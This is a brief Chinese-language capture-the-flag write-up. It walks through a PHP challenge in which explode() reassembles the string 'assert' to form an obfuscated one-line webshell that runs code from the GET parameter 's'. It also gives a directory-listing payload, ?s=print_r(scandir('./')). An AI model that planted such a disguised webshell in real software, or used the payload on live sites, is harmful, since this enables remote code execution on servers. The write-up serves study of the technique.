点开链接没有任何内容,源代码也是
后台扫描也无果
回到提示
<?php
$poc="a#s#s#e#r#t";
$poc_1=explode("#",$poc);
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s'])
?>
explode() 函数把字符串打散为数组
<?php
$poc="a#s#s#e#r#t";
$poc_1=explode("#",$poc);
print_r($poc_1);
?>
运行结果:
Array([0] => a [1] => s [2] => s [3] => e [4] => r [5] => t)
最后得到的就是 assert($_GET[‘s’])
类似于 eval($_POST[‘s’])的一句话木马
即可以用s来执行命令 扫下目录 ?s=print_r(scandir(’./’))
还是没有找到文件 去看了下别人的wp 发现到这一步就可以出flag了 可能是出题人删了吧